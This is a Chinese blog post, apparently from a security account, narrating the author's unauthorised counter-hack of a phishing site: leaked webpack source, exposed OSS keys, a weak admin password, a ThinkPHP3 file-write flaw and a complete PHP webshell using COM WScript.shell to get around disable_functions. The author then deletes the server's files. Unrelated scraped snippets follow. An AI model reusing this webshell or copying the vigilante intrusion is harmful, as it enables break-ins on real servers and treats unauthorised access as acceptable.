这是 酒仙桥六号部队 的第 139 篇文章。

全文共计1681个字,预计阅读时长6分钟


前言

在一个月黑风高的夜晚,我正在打游戏,突然微信像被轰炸一般,疯狂响起消息提示的声音,手机静音继续打游戏,没一会,电话响起来了,女朋友的打来的,一顿质问:“在干嘛,是不是不爱我了,游戏重要还是我重要!“

了解了事情真相,原来她和她的几个同事被人钓鱼了,有的人还中招了。嘿!我这暴脾气,这能忍?搞他!先等我把这把游戏打完。


正传

言归正传,搞他,我倒要看看是什么站竟然能让他们这么多人都上当。访问看看,哟,还挺专业,https都用上了,看着还挺像那么回事,盘它。

直接爆破吗?太容易打草惊蛇,先找找看有什么信息能利用的。好家伙,有webpack泄露,让我来䁖䁖里边都有啥信息,把网站的webpack打包下载下来方便搜索查看。

真是神仙开发,竟然在代码里留下了硬编码的账号密码,登上去看看,不过话又说回来,幸好没选择直接爆破,要不然,这个密码,爆破一个甲子都不一定能爆破出来。登上后台,看看有什么功能。

老子裤子都脱了,你给我看这个?我就不信这个邪,继续盘它。盯着这个泄露的webpack源码翻了半天,猜测是做钓鱼站的人从原网站上扒下来的这一套,又把代码改了改,后台功能只是个摆设,这个钓鱼站的作者的目的更多是想获取你的账号密码,要不然就是还有APP,获取你的隐私信息,不过这个钓鱼的成本就有点高了,大多数人都不会这么干,先继续看webpack代码吧,淦。

翻了半天,终于在代码里发现一个github地址,上去看看都有什么东西。

看样子是个写前端的,但是还不能确定是不是这个钓鱼站的作者,继续找找看。翻遍了这个人的所有项目,终于在一个项目中发现了一个泄露的OSS秘钥,这里我要安利一个工具了“Sourcegraph”,借助这个工具我们就可以不用下载github源码文件,直接在页面进行搜索了。

我们连接这个OSS看看有什么东西。

这不就是那个钓鱼站的图片嘛,应该就是这个人了,在根目录下还有一个excel文件,下载看看是什么东西。

好家伙,记录了不少的手机号、邮箱和密码呀,看来是他没跑了,上传的时间还挺新,先给他删了,免得再祸害其他人。在根目录下还有个备份的压缩包,下载来看看备份的是什么。

嚯,是代码,还是php的。

先看看有没有和这个钓鱼站部署在一起,nmap扫起。

Windows系统,还开了8080,访问看看。

没错,是它,和我拿到的代码中后台的页面一模一样,盘它。先爆破一下后台看看,能进后台就舒服了,试了个admin/123456,卧槽?进来了,你怕不是在逗我,都省的爆破了,也不用在本地搭环境了,直接开审,用的thinkphp3的框架,先看看登录有没有问题吧。

在后台的一个SystemController中发现修改配置的地方能写入文件,而且写入的还是php后缀的文件,这下我只需要构造参数,能让他完整保存语句,webshell能正常执行就可以了,代码拉出来试试。

这里就直接构造一句话吧。

提交之后访问写入的webshell。

卧槽?有disable_functions,既然你能让我写shell了,那我就绕你。构造请求实现下面这个webshell。

<?php$command=$_GET['a'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>

绕过了disable_functions能执行命令了,但是怎么都弹不回来shell,不过能执行命令了,也算成果吧,怎么说这权限也是管理员权限。

找到80端口对应的进程id,先把你用来害人的东西都给你删掉。

taskkill /pid 7576,再***见!再找到tomcat的目录,整个给你删掉,让你再祸害四方。

这次彻底删除了,本着劝诫的心,在桌面给这个制作钓鱼站的人留下一句话。


结语

授人以“鱼”不如授人以“娱”,多行不义,终究会被法网打捞上岸。



发布     👍 0 举报 写留言 🖊   
✋热门推荐
  • 但谁死了谁杀了谁完全不记得啦梅根真的好piu釀哦E3《煦阳岭的疑云》对那对吵架的小情侣印象深刻就是说任何亲密关系里都不能有隐瞒和欺骗女主本应也有美好的事业却为了
  • 上半年订单下滑的情况下,管理团队主动求变,活用PPV绩效模式,精兵简政,打造更高效和强大的团队。宏成咨询与您携手共进,用心做您的终身绩效伙伴[给力][给力][给
  • ”这话触及杨先生的心灵,当头棒喝,良心发现,回想起每次所钓的鱼,都是扯裂了鱼嘴唇,撕烂了鱼口腔,此时深有同感,甚感内疚。 有一天,他的太太照常来探望他,无意之间
  • 4.剪辑后的短片,再配音、配文字,就能产生远超“现实”的效果。 总结一下蒙太奇手法的特点: 1.一个完整的录像和摄影,难以吸引人,它失之于单调、没有变化。
  • 7.3~7.6漫画:新漫:少爷与秘书 完结器物的世界佣人/男佣/唯一仆人 周日的安慰/周日的慰藉是我的崽/是我们的孩子 兼职生/古怪的客人与兼职生风雨雷电/雷云
  • 金牛座的女人受到金星和月亮的有力影响,金牛座的女人不仅容貌美丽而且理智沉静,从来不信天下有免费得午餐,认为自己奋斗得来的物质保障远比嫁入豪门来的幸福快乐;建立家
  • 我本来是很生气的,因为砸到我很疼,也因为可可当时就在我旁边,很怕他受伤,但是看到小女孩那个紧张的样子,我一下子火就没了……赶紧摸摸她的后背,说:“没事的,阿姨就
  • 作品内容包含散文、诗歌、评论……】11月8日下午,《2020年丽江文学作品选》《2021年丽江文学作品选》和《落地生花的银:首届“古城杯”壹读文学奖获奖作品选》
  • 外国也有流量偶像,也有饭圈,甚至还有不少非常火的“神曲”但国外的乐坛死了吗?本月第二次了吧[哈哈]梦见你开演唱会了【对于我这种没有你的演唱会的人来说,这个消
  •   可是,堪称“最牛景区”的关山景区,十几年来,就是不给一分工资钱!人家就是这么的“牛气冲天”!该给的时候,不给;协商的时候,不给;连续的根治欠薪专项行动,不给
  • (我歌听的少TT我也是furry,有自己的设子但是我不约稿,只有兽装(头/爪/尾)和那些微薄的稿(x。 #墨家零售商[超话]# 事情起因是某天看到她换素颜肉 我
  • 野生的夏天#2021 京北露营节# 【露营达人限时招募中】走进原乡小镇Sorehsa康养公园,享受价值超¥1499元2天1夜奢华露营体验,山野、篝火、音乐、野
  • 报告目录第一章血氧仪产业相关概述第一节 血氧仪产品概况一、血氧仪产品简介二、血氧仪产品原理三、血氧仪产品分类第二节 手指血氧仪简介一、手指血氧仪应用范围二、技术
  • 除此之外,经纪人还称:大S仍念及夫妻一场,还有两个孩子,希望他能把孩子的利益放在个人利益之前,不要利用媒体来制造舆论;并内涵张兰利用此事直播带货,卖了1万箱
  • 不需要刻意去做什麼大善之事,不貪不妒,不虛不騙,對花草有情,對旁人有容,虛懷若谷,知恩圖報,已然為善。#阳光信用[超话]#[抱抱] #每日一善#[抱抱] #阳光
  • [馋嘴]这个有线网络,在移动端安卓系统中用得比较少,所以厂商没太多进行电脑端上的优化。小鹏汽车创始人吹嘘九几年在广州装电脑一台赚四五千,这完全是利用信息不对等赚
  • 昨天带俩娃去体检姥姥和一个带二胎的老人聊天说他们家也是姐妹俩也差两岁 姐姐完全不让妈妈抱妹妹有时候还打妹妹全家因为这个很烦恼__真的很庆幸有个这么温暖的姐姐偶尔
  • 我和你就像在公路上向着不同方向行驶的汽车,一次的相遇 之后还是各奔东西,我原以为我停在相遇的地方会等到你回来的那一天,可我忘了路还有很多条,风景也有很多,也许这
  • 一些乱七八糟的记录,怕以后忘记了,随便发一发记录下来[兔子]以前我睡着了都是拍一拍,现在改成写备忘录回消息了了哈哈哈,还是很可爱然后今年的第三次见面异常的顺利,
  • H&M这项旧衣回收计划赢得了很多人的支持,人们纷纷将打包好的旧衣物交给H&M门店处理,这些本来「毫无用处」的衣物又开始以崭新的面目出现在人们的生